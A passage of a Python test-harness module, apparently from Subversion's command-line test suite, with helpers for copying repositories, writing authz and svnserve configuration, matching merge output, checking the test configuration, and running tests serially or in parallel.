"Copy the repository SRC_PATH, with head revision HEAD_REVISION, to DST_PATH"
# Save any previous value of SVN_DBG_QUIET
saved_quiet = os.environ.get('SVN_DBG_QUIET')
os.environ['SVN_DBG_QUIET'] = 'y'
# Do an svnadmin dump|svnadmin load cycle. Print a fake pipe command so that
# the displayed CMDs can be run by hand
create_repos(dst_path, minor_version)
dump_args = ['dump', src_path]
load_args = ['load', dst_path]
if ignore_uuid:
load_args = load_args + ['--ignore-uuid']
logger.info('CMD: %s %s | %s %s' %
(os.path.basename(svnadmin_binary), ' '.join(dump_args),
os.path.basename(svnadmin_binary), ' '.join(load_args)))
start = time.time()
dump_in, dump_out, dump_err, dump_kid = open_pipe(
[svnadmin_binary] + dump_args)
load_in, load_out, load_err, load_kid = open_pipe(
[svnadmin_binary] + load_args,
stdin=dump_out) # Attached to dump_kid
load_stdout, load_stderr, load_exit_code = wait_on_pipe(load_kid, True)
dump_stdout, dump_stderr, dump_exit_code = wait_on_pipe(dump_kid, True)
dump_in.close()
dump_out.close()
dump_err.close()
#load_in is dump_out so it's already closed.
load_out.close()
load_err.close()
stop = time.time()
logger.info('<TIME = %.6f>' % (stop - start))
if saved_quiet is None:
del os.environ['SVN_DBG_QUIET']
else:
os.environ['SVN_DBG_QUIET'] = saved_quiet
dump_re = re.compile(r'^\* Dumped revision (\d+)\.\r?$')
expect_revision = 0
dump_failed = False
for dump_line in dump_stderr:
match = dump_re.match(dump_line)
if not match or match.group(1) != str(expect_revision):
logger.warn('ERROR: dump failed: %s', dump_line.strip())
dump_failed = True
else:
expect_revision += 1
if dump_failed:
raise SVNRepositoryCopyFailure
if expect_revision != head_revision + 1:
logger.warn('ERROR: dump failed; did not see revision %s', head_revision)
raise SVNRepositoryCopyFailure
load_re = re.compile(r'^------- Committed revision (\d+) >>>\r?$')
expect_revision = 1
for load_line in filter_dbg(load_stdout):
match = load_re.match(load_line)
if match:
if match.group(1) != str(expect_revision):
logger.warn('ERROR: load failed: %s', load_line.strip())
raise SVNRepositoryCopyFailure
expect_revision += 1
if expect_revision != head_revision + 1:
logger.warn('ERROR: load failed; did not see revision %s', head_revision)
raise SVNRepositoryCopyFailure
def canonicalize_url(input):
"Canonicalize the url, if the scheme is unknown, returns intact input"
m = re.match(r"^((file://)|((svn|svn\+ssh|http|https)(://)))", input)
if m:
scheme = m.group(1)
return scheme + re.sub(r'//*', '/', input[len(scheme):])
else:
return input
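# e.g. (illustrative):
#   canonicalize_url('http://host//a///b')  -> 'http://host/a/b'
#   canonicalize_url('ftp://host//a')       -> 'ftp://host//a'  (unknown scheme)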
def create_python_hook_script(hook_path, hook_script_code,
cmd_alternative=None):
"""Create a Python hook script at HOOK_PATH with the specified
HOOK_SCRIPT_CODE."""
if windows:
if cmd_alternative is not None:
file_write("%s.bat" % hook_path,
cmd_alternative)
else:
# Use an absolute path since the working directory is not guaranteed
hook_path = os.path.abspath(hook_path)
# Fill the python file.
file_write("%s.py" % hook_path, hook_script_code)
# Fill the batch wrapper file.
file_write("%s.bat" % hook_path,
"@\"%s\" %s.py %%*\n" % (sys.executable, hook_path))
else:
# For all other platforms
file_write(hook_path, "#!%s\n%s" % (sys.executable, hook_script_code))
os.chmod(hook_path, 0755)
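# Illustrative call (`repo_dir` is a hypothetical repository path): install a
# pre-commit hook that rejects every commit:
#   create_python_hook_script(get_pre_commit_hook_path(repo_dir),
#                             'import sys\nsys.exit(1)\n')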
def write_restrictive_svnserve_conf(repo_dir, anon_access="none"):
"Create a restrictive authz file ( no anynomous access )."
fp = open(get_svnserve_conf_file_path(repo_dir), 'w')
fp.write("[general]\nanon-access = %s\nauth-access = write\n"
"authz-db = authz\n" % anon_access)
if options.enable_sasl:
fp.write("realm = svntest\n[sasl]\nuse-sasl = true\n");
else:
fp.write("password-db = passwd\n")
fp.close()
def write_restrictive_svnserve_conf_with_groups(repo_dir,
anon_access="none"):
"Create a restrictive configuration with groups stored in a separate file."
fp = open(get_svnserve_conf_file_path(repo_dir), 'w')
fp.write("[general]\nanon-access = %s\nauth-access = write\n"
"authz-db = authz\ngroups-db = groups\n" % anon_access)
if options.enable_sasl:
fp.write("realm = svntest\n[sasl]\nuse-sasl = true\n");
else:
fp.write("password-db = passwd\n")
fp.close()
# Warning: because mod_dav_svn uses one shared authz file for all
# repositories, you *cannot* use write_authz_file in any test that
# might be run in parallel.
#
# write_authz_file can *only* be used in test suites which disable
# parallel execution at the bottom like so
# if __name__ == '__main__':
# svntest.main.run_tests(test_list, serial_only = True)
def write_authz_file(sbox, rules, sections=None):
"""Write an authz file to SBOX, appropriate for the RA method used,
  with authorization rules RULES mapping paths to strings containing
the rules. You can add sections SECTIONS (ex. groups, aliases...) with
an appropriate list of mappings.
"""
fp = open(sbox.authz_file, 'w')
  # When the sandbox repository is read-only, its name will be different from
# the repository name.
repo_name = sbox.repo_dir
while repo_name[-1] == '/':
repo_name = repo_name[:-1]
repo_name = os.path.basename(repo_name)
if sbox.repo_url.startswith("http"):
prefix = repo_name + ":"
else:
prefix = ""
if sections:
for p, r in sections.items():
fp.write("[%s]\n%s\n" % (p, r))
for p, r in rules.items():
fp.write("[%s%s]\n%s\n" % (prefix, p, r))
fp.close()
# See the warning about parallel test execution in write_authz_file
# method description.
def write_groups_file(sbox, groups):
"""Write a groups file to SBOX, appropriate for the RA method used,
with group contents set to GROUPS."""
fp = open(sbox.groups_file, 'w')
fp.write("[groups]\n")
if groups:
for p, r in groups.items():
fp.write("%s = %s\n" % (p, r))
fp.close()
def use_editor(func):
os.environ['SVN_EDITOR'] = svneditor_script
os.environ['SVN_MERGE'] = svneditor_script
os.environ['SVNTEST_EDITOR_FUNC'] = func
os.environ['SVN_TEST_PYTHON'] = sys.executable
def mergeinfo_notify_line(revstart, revend, target=None):
"""Return an expected output line that describes the beginning of a
mergeinfo recording notification on revisions REVSTART through REVEND."""
if target:
target_re = re.escape(target)
else:
target_re = ".+"
if (revend is None):
if (revstart < 0):
revstart = abs(revstart)
return "--- Recording mergeinfo for reverse merge of r%ld into '%s':\n" \
% (revstart, target_re)
else:
return "--- Recording mergeinfo for merge of r%ld into '%s':\n" \
% (revstart, target_re)
elif (revstart < revend):
return "--- Recording mergeinfo for merge of r%ld through r%ld into '%s':\n" \
% (revstart, revend, target_re)
else:
return "--- Recording mergeinfo for reverse merge of r%ld through " \
"r%ld into '%s':\n" % (revstart, revend, target_re)
def merge_notify_line(revstart=None, revend=None, same_URL=True,
foreign=False, target=None):
"""Return an expected output line that describes the beginning of a
merge operation on revisions REVSTART through REVEND. Omit both
REVSTART and REVEND for the case where the left and right sides of
the merge are from different URLs."""
from_foreign_phrase = foreign and "\(from foreign repository\) " or ""
if target:
target_re = re.escape(target)
else:
target_re = ".+"
if not same_URL:
return "--- Merging differences between %srepository URLs into '%s':\n" \
% (foreign and "foreign " or "", target_re)
if revend is None:
if revstart is None:
# The left and right sides of the merge are from different URLs.
return "--- Merging differences between %srepository URLs into '%s':\n" \
% (foreign and "foreign " or "", target_re)
elif revstart < 0:
return "--- Reverse-merging %sr%ld into '%s':\n" \
% (from_foreign_phrase, abs(revstart), target_re)
else:
return "--- Merging %sr%ld into '%s':\n" \
% (from_foreign_phrase, revstart, target_re)
else:
if revstart > revend:
return "--- Reverse-merging %sr%ld through r%ld into '%s':\n" \
% (from_foreign_phrase, revstart, revend, target_re)
else:
return "--- Merging %sr%ld through r%ld into '%s':\n" \
% (from_foreign_phrase, revstart, revend, target_re)
def summary_of_conflicts(text_conflicts=0,
prop_conflicts=0,
tree_conflicts=0,
text_resolved=0,
prop_resolved=0,
tree_resolved=0,
skipped_paths=0,
as_regex=False):
"""Return a list of lines corresponding to the summary of conflicts and
skipped paths that is printed by merge and update and switch. If all
parameters are zero, return an empty list.
"""
lines = []
if (text_conflicts or prop_conflicts or tree_conflicts
or text_resolved or prop_resolved or tree_resolved
or skipped_paths):
lines.append("Summary of conflicts:\n")
if text_conflicts or text_resolved:
if text_resolved == 0:
lines.append(" Text conflicts: %d\n" % text_conflicts)
else:
lines.append(" Text conflicts: %d remaining (and %d already resolved)\n"
% (text_conflicts, text_resolved))
if prop_conflicts or prop_resolved:
if prop_resolved == 0:
lines.append(" Property conflicts: %d\n" % prop_conflicts)
else:
lines.append(" Property conflicts: %d remaining (and %d already resolved)\n"
% (prop_conflicts, prop_resolved))
if tree_conflicts or tree_resolved:
if tree_resolved == 0:
lines.append(" Tree conflicts: %d\n" % tree_conflicts)
else:
lines.append(" Tree conflicts: %d remaining (and %d already resolved)\n"
% (tree_conflicts, tree_resolved))
if skipped_paths:
lines.append(" Skipped paths: %d\n" % skipped_paths)
if as_regex:
lines = map(re.escape, lines)
return lines
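# Worked example (illustrative): summary_of_conflicts(text_conflicts=1,
# skipped_paths=2) returns
#   ['Summary of conflicts:\n',
#    '  Text conflicts: 1\n',
#    '  Skipped paths: 2\n']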
def make_log_msg():
"Conjure up a log message based on the calling test."
for idx in range(1, 100):
frame = sys._getframe(idx)
# If this frame isn't from a function in *_tests.py, then skip it.
filename = frame.f_code.co_filename
if not filename.endswith('_tests.py'):
continue
# There should be a test_list in this module.
test_list = frame.f_globals.get('test_list')
if test_list is None:
continue
# If the function is not in the test_list, then skip it.
func_name = frame.f_code.co_name
func_ob = frame.f_globals.get(func_name)
if func_ob not in test_list:
continue
# Make the log message look like a line from a traceback.
# Well...close. We use single quotes to avoid interfering with the
# double-quote quoting performed on Windows
return "File '%s', line %d, in %s" % (filename, frame.f_lineno, func_name)
######################################################################
# Functions which check the test configuration
# (useful for conditional XFails)
def is_ra_type_dav():
return options.test_area_url.startswith('http')
def is_ra_type_dav_neon():
"""Return True iff running tests over RA-Neon.
CAUTION: Result is only valid if svn was built to support both."""
return options.test_area_url.startswith('http') and \
(options.http_library == "neon")
def is_ra_type_dav_serf():
"""Return True iff running tests over RA-Serf.
CAUTION: Result is only valid if svn was built to support both."""
return options.test_area_url.startswith('http') and \
(options.http_library == "serf")
def is_ra_type_svn():
"""Return True iff running tests over RA-svn."""
return options.test_area_url.startswith('svn')
def is_ra_type_file():
"""Return True iff running tests over RA-local."""
return options.test_area_url.startswith('file')
def is_fs_type_fsfs():
# This assumes that fsfs is the default fs implementation.
return options.fs_type == 'fsfs' or options.fs_type is None
def is_fs_type_bdb():
return options.fs_type == 'bdb'
def is_os_windows():
return os.name == 'nt'
def is_windows_type_dav():
return is_os_windows() and is_ra_type_dav()
def is_posix_os():
return os.name == 'posix'
def is_os_darwin():
return sys.platform == 'darwin'
def is_fs_case_insensitive():
return (is_os_darwin() or is_os_windows())
def is_threaded_python():
return True
def server_has_mergeinfo():
return options.server_minor_version >= 5
def server_has_revprop_commit():
return options.server_minor_version >= 5
def server_authz_has_aliases():
return options.server_minor_version >= 5
def server_gets_client_capabilities():
return options.server_minor_version >= 5
def server_has_partial_replay():
return options.server_minor_version >= 5
def server_enforces_UTF8_fspaths_in_verify():
return options.server_minor_version >= 6
def server_enforces_date_syntax():
return options.server_minor_version >= 5
def server_has_atomic_revprop():
return options.server_minor_version >= 7
def is_plaintext_password_storage_disabled():
try:
predicate = re.compile("^WARNING: Plaintext password storage is enabled!")
code, out, err = run_svn(False, "--version")
for line in out:
if predicate.match(line):
return False
except:
return False
return True
# https://issues.apache.org/bugzilla/show_bug.cgi?id=56480
# https://issues.apache.org/bugzilla/show_bug.cgi?id=55397
__mod_dav_url_quoting_broken_versions = frozenset([
'2.2.27',
'2.2.26',
'2.2.25',
'2.4.9',
'2.4.8',
'2.4.7',
'2.4.6',
'2.4.5',
])
def is_mod_dav_url_quoting_broken():
if is_ra_type_dav():
return (options.httpd_version in __mod_dav_url_quoting_broken_versions)
return None
def is_httpd_authz_provider_enabled():
if is_ra_type_dav():
v = options.httpd_version.split('.')
return (v[0] == '2' and int(v[1]) >= 3) or int(v[0]) > 2
return None
######################################################################
class TestSpawningThread(threading.Thread):
"""A thread that runs test cases in their own processes.
Receives test numbers to run from the queue, and saves results into
the results field."""
def __init__(self, queue, progress_func, tests_total):
threading.Thread.__init__(self)
self.queue = queue
self.results = []
self.progress_func = progress_func
self.tests_total = tests_total
def run(self):
while True:
try:
next_index = self.queue.get_nowait()
except queue.Empty:
return
self.run_one(next_index)
# signal progress
if self.progress_func:
self.progress_func(self.tests_total - self.queue.qsize(),
self.tests_total)
def run_one(self, index):
command = os.path.abspath(sys.argv[0])
args = []
args.append(str(index))
args.append('-c')
# add some startup arguments from this process
if options.fs_type:
args.append('--fs-type=' + options.fs_type)
if options.test_area_url:
args.append('--url=' + options.test_area_url)
if logger.getEffectiveLevel() <= logging.DEBUG:
args.append('-v')
if options.cleanup:
args.append('--cleanup')
if options.enable_sasl:
args.append('--enable-sasl')
if options.http_library:
args.append('--http-library=' + options.http_library)
if options.server_minor_version:
args.append('--server-minor-version=' + str(options.server_minor_version))
if options.mode_filter:
args.append('--mode-filter=' + options.mode_filter)
if options.milestone_filter:
args.append('--milestone-filter=' + options.milestone_filter)
if options.ssl_cert:
args.append('--ssl-cert=' + options.ssl_cert)
if options.http_proxy:
args.append('--http-proxy=' + options.http_proxy)
if options.httpd_version:
args.append('--httpd-version=' + options.httpd_version)
result, stdout_lines, stderr_lines = spawn_process(command, 0, False, None,
*args)
self.results.append((index, result, stdout_lines, stderr_lines))
class TestRunner:
"""Encapsulate a single test case (predicate), including logic for
  running the test and test list output."""
def __init__(self, func, index):
self.pred = svntest.testcase.create_test_case(func)
self.index = index
def list(self, milestones_dict=None):
"""Print test doc strings. MILESTONES_DICT is an optional mapping
    of issue numbers to a list containing the target milestone and who
the issue is assigned to."""
if options.mode_filter.upper() == 'ALL' \
or options.mode_filter.upper() == self.pred.list_mode().upper() \
or (options.mode_filter.upper() == 'PASS' \
and self.pred.list_mode() == ''):
issues = []
tail = ''
if self.pred.issues:
if not options.milestone_filter or milestones_dict is None:
issues = self.pred.issues
tail += " [%s]" % ','.join(['#%s' % str(i) for i in issues])
else: # Limit listing by requested target milestone(s).
filter_issues = []
matches_filter = False
# Get the milestones for all the issues associated with this test.
# If any one of them matches the MILESTONE_FILTER then we'll print
# them all.
for issue in self.pred.issues:
# Some safe starting assumptions.
milestone = 'unknown'
assigned_to = 'unknown'
if milestones_dict:
if milestones_dict.has_key(str(issue)):
milestone = milestones_dict[str(issue)][0]
assigned_to = milestones_dict[str(issue)][1]
filter_issues.append(
str(issue) + '(' + milestone + '/' + assigned_to + ')')
pattern = re.compile(options.milestone_filter)
if pattern.match(milestone):
matches_filter = True
# Did at least one of the associated issues meet our filter?
if matches_filter:
issues = filter_issues
# Wrap the issue#/target-milestone/assigned-to string
# to the next line and add a line break to enhance
# readability.
tail += "\n %s" % '\n '.join(
['#%s' % str(i) for i in issues])
tail += '\n'
      # If there is no filter or this test made it through
# the filter then print it!
if options.milestone_filter is None or len(issues):
        if self.pred.inprogress:
          tail += " [[%s]]" % self.pred.inprogress

        print(" %3d %-5s %s%s" % (self.index,
                                  self.pred.list_mode(),
                                  self.pred.description,
                                  tail))
sys.stdout.flush()
def get_mode(self):
return self.pred.list_mode()
def get_issues(self):
return self.pred.issues
def get_function_name(self):
return self.pred.get_function_name()
def _print_name(self, prefix):
if self.pred.inprogress:
print("%s %s %s: %s [[WIMP: %s]]" % (prefix,
os.path.basename(sys.argv[0]),
str(self.index),
self.pred.description,
self.pred.inprogress))
else:
print("%s %s %s: %s" % (prefix,
os.path.basename(sys.argv[0]),
str(self.index),
self.pred.description))
sys.stdout.flush()
def run(self):
"""Run self.pred and return the result. The return value is
- 0 if the test was successful
- 1 if it errored in a way that indicates test failure
    - 2 if the test was skipped
"""
sbox_name = self.pred.get_sandbox_name()
if sbox_name:
sandbox = svntest.sandbox.Sandbox(sbox_name, self.index)
else:
sandbox = None
# Explicitly set this so that commands that commit but don't supply a
# log message will fail rather than invoke an editor.
# Tests that want to use an editor should invoke svntest.main.use_editor.
os.environ['SVN_EDITOR'] = ''
os.environ['SVNTEST_EDITOR_FUNC'] = ''
if options.use_jsvn:
# Set this SVNKit specific variable to the current test (test name plus
# its index) being run so that SVNKit daemon could use this test name
# for its separate log file
os.environ['SVN_CURRENT_TEST'] = os.path.basename(sys.argv[0]) + "_" + \
str(self.index)
svntest.actions.no_sleep_for_timestamps()
svntest.actions.do_relocate_validation()
saved_dir = os.getcwd()
try:
rc = self.pred.run(sandbox)
if rc is not None:
self._print_name('STYLE ERROR in')
print('Test driver returned a status code.')
sys.exit(255)
result = svntest.testcase.RESULT_OK
except Skip, ex:
result = svntest.testcase.RESULT_SKIP
except Failure, ex:
result = svntest.testcase.RESULT_FAIL
msg = ''
# We captured Failure and its subclasses. We don't want to print
# anything for plain old Failure since that just indicates test
# failure, rather than relevant information. However, if there
# *is* information in the exception's arguments, then print it.
if ex.__class__ != Failure or ex.args:
ex_args = str(ex)
logger.warn('CWD: %s' % os.getcwd())
if ex_args:
msg = 'EXCEPTION: %s: %s' % (ex.__class__.__name__, ex_args)
else:
msg = 'EXCEPTION: %s' % ex.__class__.__name__
logger.warn(msg, exc_info=True)
except KeyboardInterrupt:
logger.error('Interrupted')
sys.exit(0)
except SystemExit, ex:
logger.error('EXCEPTION: SystemExit(%d), skipping cleanup' % ex.code)
self._print_name(ex.code and 'FAIL: ' or 'PASS: ')
raise
except:
result = svntest.testcase.RESULT_FAIL
logger.warn('CWD: %s' % os.getcwd(), exc_info=True)
os.chdir(saved_dir)
exit_code, result_text, result_benignity = self.pred.results(result)
if not (options.quiet and result_benignity):
self._print_name(result_text)
if sandbox is not None and exit_code != 1 and options.cleanup:
sandbox.cleanup_test_paths()
return exit_code
def is_httpd_authz_provider_enabled():
if is_ra_type_dav():
v = options.httpd_version.split('.')
return (v[0] == '2' and int(v[1]) >= 3) or int(v[0]) > 2
return None
######################################################################
# Main testing functions
# These two functions each take a TEST_LIST as input. The TEST_LIST
# should be a list of test functions; each test function should take
# no arguments and return a 0 on success, non-zero on failure.
# Ideally, each test should also have a short, one-line docstring (so
# it can be displayed by the 'list' command.)
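# For example (illustrative only; the test names are hypothetical), a
# test script typically ends with something like:
#
#   test_list = [ None,
#                 basic_checkout,
#                 basic_commit,
#               ]
#   if __name__ == '__main__':
#     svntest.main.run_tests(test_list)
#
# Index 0 is a placeholder (None) so that tests are numbered from 1.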
# Func to run one test in the list.
def run_one_test(n, test_list, finished_tests = None):
"""Run the Nth client test in TEST_LIST, return the result.
  If we're running the tests in parallel, spawn the test in a new process.
"""
# allow N to be negative, so './basic_tests.py -- -1' works
num_tests = len(test_list) - 1
if (n == 0) or (abs(n) > num_tests):
print("There is no test %s.\n" % n)
return 1
if n < 0:
n += 1+num_tests
test_mode = TestRunner(test_list[n], n).get_mode().upper()
if options.mode_filter.upper() == 'ALL' \
or options.mode_filter.upper() == test_mode \
or (options.mode_filter.upper() == 'PASS' and test_mode == ''):
# Run the test.
exit_code = TestRunner(test_list[n], n).run()
return exit_code
else:
return 0
def _internal_run_tests(test_list, testnums, parallel, srcdir, progress_func):
"""Run the tests from TEST_LIST whose indices are listed in TESTNUMS.
  If we're running the tests in parallel, spawn as many parallel processes
  as requested and gather the results in a temporary buffer as each child
  process finishes.
"""
exit_code = 0
finished_tests = []
tests_started = 0
# Some of the tests use sys.argv[0] to locate their test data
# directory. Perhaps we should just be passing srcdir to the tests?
if srcdir:
sys.argv[0] = os.path.join(srcdir, 'subversion', 'tests', 'cmdline',
sys.argv[0])
if not parallel:
for i, testnum in enumerate(testnums):
if run_one_test(testnum, test_list) == 1:
exit_code = 1
# signal progress
if progress_func:
progress_func(i+1, len(testnums))
else:
number_queue = queue.Queue()
for num in testnums:
number_queue.put(num)
threads = [ TestSpawningThread(number_queue, progress_func,
len(testnums)) for i in range(parallel) ]
for t in threads:
t.start()
for t in threads:
t.join()
# list of (index, result, stdout, stderr)
results = []
for t in threads:
results += t.results
results.sort()
# all tests are finished, find out the result and print the logs.
for (index, result, stdout_lines, stderr_lines) in results:
if stdout_lines:
for line in stdout_lines:
sys.stdout.write(line)
if stderr_lines:
for line in stderr_lines:
sys.stdout.write(line)
if result == 1:
exit_code = 1
svntest.sandbox.cleanup_deferred_test_paths()
return exit_code
def create_default_options():
"""Set the global options to the defaults, as provided by the argument
parser."""
_parse_options([])
def _create_parser():
"""Return a parser for our test suite."""
def set_log_level(option, opt, value, parser, level=None):
if level:
# called from --verbose
logger.setLevel(level)
else:
# called from --set-log-level
logger.setLevel(getattr(logging, value, None) or int(value))
# set up the parser
_default_http_library = 'serf'
usage = 'usage: %prog [options] [<test> ...]'
parser = optparse.OptionParser(usage=usage)
parser.add_option('-l', '--list', action='store_true', dest='list_tests',
help='Print test doc strings instead of running them')
parser.add_option('--milestone-filter', action='store', dest='milestone_filter',
help='Limit --list to those with target milestone specified')
parser.add_option('-v', '--verbose', action='callback',
callback=set_log_level, callback_args=(logging.DEBUG, ),
help='Print binary command-lines (same as ' +
'"--set-log-level logging.DEBUG")')
parser.add_option('-q', '--quiet', action='store_true',
help='Print only unexpected results (not with --verbose)')
parser.add_option('-p', '--parallel', action='store_const',
const=default_num_threads, dest='parallel',
help='Run the tests in parallel')
parser.add_option('-c', action='store_true', dest='is_child_process',
help='Flag if we are running this python test as a ' +
'child process')
parser.add_option('--mode-filter', action='store', dest='mode_filter',
default='ALL',
help='Limit tests to those with type specified (e.g. XFAIL)')
parser.add_option('--url', action='store',
help='Base url to the repos (e.g. svn://localhost)')
parser.add_option('--fs-type', action='store',
help='Subversion file system type (fsfs or bdb)')
parser.add_option('--cleanup', action='store_true',
help='Whether to clean up')
parser.add_option('--enable-sasl', action='store_true',
help='Whether to enable SASL authentication')
parser.add_option('--bin', action='store', dest='svn_bin',
help='Use the svn binaries installed in this path')
parser.add_option('--use-jsvn', action='store_true',
help="Use the jsvn (SVNKit based) binaries. Can be " +
"combined with --bin to point to a specific path")
parser.add_option('--http-library', action='store',
help="Make svn use this DAV library (neon or serf) if " +
"it supports both, else assume it's using this " +
"one; the default is " + _default_http_library)
parser.add_option('--server-minor-version', type='int', action='store',
help="Set the minor version for the server ('3'..'%d')."
% SVN_VER_MINOR)
parser.add_option('--fsfs-packing', action='store_true',
help="Run 'svnadmin pack' automatically")
parser.add_option('--fsfs-sharding', action='store', type='int',
help='Default shard size (for fsfs)')
parser.add_option('--config-file', action='store',
help="Configuration file for tests.")
parser.add_option('--set-log-level', action='callback', type='str',
callback=set_log_level,
help="Set log level (numerically or symbolically). " +
"Symbolic levels are: CRITICAL, ERROR, WARNING, " +
"INFO, DEBUG")
parser.add_option('--log-with-timestamps', action='store_true',
help="Show timestamps in test log.")
parser.add_option('--keep-local-tmp', action='store_true',
help="Don't remove svn-test-work/local_tmp after test " +
"run is complete. Useful for debugging failures.")
parser.add_option('--development', action='store_true',
help='Test development mode: provides more detailed ' +
'test output and ignores all exceptions in the ' +
'run_and_verify* functions. This option is only ' +
'useful during test development!')
parser.add_option('--srcdir', action='store', dest='srcdir',
help='Source directory.')
parser.add_option('--ssl-cert', action='store',
help='Path to SSL server certificate.')
parser.add_option('--http-proxy', action='store',
help='Use the HTTP Proxy at hostname:port.')
parser.add_option('--httpd-version', action='store',
help='Assume HTTPD is this version.')
parser.add_option('--tools-bin', action='store', dest='tools_bin',
help='Use the svn tools installed in this path')
# most of the defaults are None, but some are other values, set them here
parser.set_defaults(
server_minor_version=SVN_VER_MINOR,
url=file_scheme_prefix + \
urllib.pathname2url(os.path.abspath(os.getcwd())),
http_library=_default_http_library)
return parser
def _parse_options(arglist=sys.argv[1:]):
"""Parse the arguments in arg_list, and set the global options object with
the results"""
global options
parser = _create_parser()
(options, args) = parser.parse_args(arglist)
# some sanity checking
if options.fsfs_packing and not options.fsfs_sharding:
parser.error("--fsfs-packing requires --fsfs-sharding")
# If you change the below condition then change
# ../../../../build/run_tests.py too.
if options.server_minor_version not in range(3, SVN_VER_MINOR+1):
parser.error("test harness only supports server minor versions 3-%d"
% SVN_VER_MINOR)
if options.url:
if options.url[-1:] == '/': # Normalize url to have no trailing slash
options.test_area_url = options.url[:-1]
else:
options.test_area_url = options.url
return (parser, args)
def run_tests(test_list, serial_only = False):
"""Main routine to run all tests in TEST_LIST.
NOTE: this function does not return. It does a sys.exit() with the
appropriate exit code.
"""
sys.exit(execute_tests(test_list, serial_only))
def get_issue_details(issue_numbers):
"""For each issue number in ISSUE_NUMBERS query the issue
tracker and determine what the target milestone is and
who the issue is assigned to. Return this information
as a dictionary mapping issue numbers to a list
[target_milestone, assigned_to]"""
xml_url = "http://subversion.tigris.org/issues/xml.cgi?id="
issue_dict = {}
if isinstance(issue_numbers, int):
issue_numbers = [str(issue_numbers)]
elif isinstance(issue_numbers, str):
issue_numbers = [issue_numbers]
if issue_numbers is None or len(issue_numbers) == 0:
return issue_dict
for num in issue_numbers:
xml_url += str(num) + ','
issue_dict[str(num)] = 'unknown'
try:
# Parse the xml for ISSUE_NO from the issue tracker into a Document.
issue_xml_f = urllib.urlopen(xml_url)
except:
print "WARNING: Unable to contact issue tracker; " \
"milestones defaulting to 'unknown'."
return issue_dict
try:
xmldoc = xml.dom.minidom.parse(issue_xml_f)
issue_xml_f.close()
# For each issue: Get the target milestone and who
# the issue is assigned to.
issue_element = xmldoc.getElementsByTagName('issue')
for i in issue_element:
issue_id_element = i.getElementsByTagName('issue_id')
issue_id = issue_id_element[0].childNodes[0].nodeValue
milestone_element = i.getElementsByTagName('target_milestone')
milestone = milestone_element[0].childNodes[0].nodeValue
assignment_element = i.getElementsByTagName('assigned_to')
assignment = assignment_element[0].childNodes[0].nodeValue
issue_dict[issue_id] = [milestone, assignment]
except:
print "ERROR: Unable to parse target milestones from issue tracker"
raise
return issue_dict
class AbbreviatedFormatter(logging.Formatter):
"""A formatter with abbreviated loglevel indicators in the output.
Use %(levelshort)s in the format string to get a single character
  representing the loglevel.
"""
_level_short = {
logging.CRITICAL : 'C',
logging.ERROR : 'E',
logging.WARNING : 'W',
logging.INFO : 'I',
logging.DEBUG : 'D',
logging.NOTSET : '-',
}
def format(self, record):
record.levelshort = self._level_short[record.levelno]
return logging.Formatter.format(self, record)
# Main func. This is the "entry point" that all the test scripts call
# to run their list of tests.
#
# This routine parses sys.argv to decide what to do.
def execute_tests(test_list, serial_only = False, test_name = None,
progress_func = None, test_selection = []):
"""Similar to run_tests(), but just returns the exit code, rather than
exiting the process. This function can be used when a caller doesn't
want the process to die."""
global logger
global pristine_url
global pristine_greek_repos_url
global svn_binary
global svnadmin_binary
global svnlook_binary
global svnsync_binary
global svndumpfilter_binary
global svnversion_binary
global svnmucc_binary
global svnauthz_binary
global svnauthz_validate_binary
global options
if test_name:
sys.argv[0] = test_name
testnums = []
# Initialize the LOGGER global variable so the option parsing can set
# its loglevel, as appropriate.
logger = logging.getLogger()
# Did some chucklehead log something before we configured it? If they
# did, then a default handler/formatter would get installed. We want
# to be the one to install the first (and only) handler.
for handler in logger.handlers:
if not isinstance(handler.formatter, AbbreviatedFormatter):
raise Exception('Logging occurred before configuration. Some code'
' path needs to be fixed. Examine the log output'
' to find what/where logged something.')
if not options:
# Override which tests to run from the commandline
(parser, args) = _parse_options()
test_selection = args
else:
parser = _create_parser()
# If there are no handlers registered yet, then install our own with
# our custom formatter. (anything currently installed *is* our handler
# as tested above)
if not logger.handlers:
# Now that we have some options, let's get the logger configured before
# doing anything more
if options.log_with_timestamps:
formatter = AbbreviatedFormatter('%(levelshort)s:'
' [%(asctime)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
else:
formatter = AbbreviatedFormatter('%(levelshort)s: %(message)s')
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
logger.addHandler(handler)
# parse the positional arguments (test nums, names)
for arg in test_selection:
appended = False
try:
testnums.append(int(arg))
appended = True
except ValueError:
# Do nothing for now.
appended = False
if not appended:
try:
# Check if the argument is a range
        numberstrings = arg.split(':')
        if len(numberstrings) != 2:
          numberstrings = arg.split('-')
if len(numberstrings) != 2:
raise ValueError
left = int(numberstrings[0])
right = int(numberstrings[1])
if left > right:
raise ValueError
for nr in range(left,right+1):
testnums.append(nr)
else:
appended = True
except ValueError:
appended = False
if not appended:
try:
# Check if the argument is a function name, and translate
# it to a number if possible
for testnum in list(range(1, len(test_list))):
test_case = TestRunner(test_list[testnum], testnum)
if test_case.get_function_name() == str(arg):
testnums.append(testnum)
appended = True
break
except ValueError:
appended = False
if not appended:
parser.error("invalid test number, range of numbers, " +
"or function '%s'\n" % arg)
# Calculate pristine_greek_repos_url from test_area_url.
pristine_greek_repos_url = options.test_area_url + '/' + \
urllib.pathname2url(pristine_greek_repos_dir)
if options.use_jsvn:
if options.svn_bin is None:
options.svn_bin = ''
svn_binary = os.path.join(options.svn_bin, 'jsvn' + _bat)
svnadmin_binary = os.path.join(options.svn_bin, 'jsvnadmin' + _bat)
svnlook_binary = os.path.join(options.svn_bin, 'jsvnlook' + _bat)
svnsync_binary = os.path.join(options.svn_bin, 'jsvnsync' + _bat)
svndumpfilter_binary = os.path.join(options.svn_bin,
'jsvndumpfilter' + _bat)
svnversion_binary = os.path.join(options.svn_bin,
'jsvnversion' + _bat)
svnmucc_binary = os.path.join(options.svn_bin, 'jsvnmucc' + _bat)
else:
if options.svn_bin:
svn_binary = os.path.join(options.svn_bin, 'svn' + _exe)
svnadmin_binary = os.path.join(options.svn_bin, 'svnadmin' + _exe)
svnlook_binary = os.path.join(options.svn_bin, 'svnlook' + _exe)
svnsync_binary = os.path.join(options.svn_bin, 'svnsync' + _exe)
svndumpfilter_binary = os.path.join(options.svn_bin,
'svndumpfilter' + _exe)
svnversion_binary = os.path.join(options.svn_bin, 'svnversion' + _exe)
svnmucc_binary = os.path.join(options.svn_bin, 'svnmucc' + _exe)
if options.tools_bin:
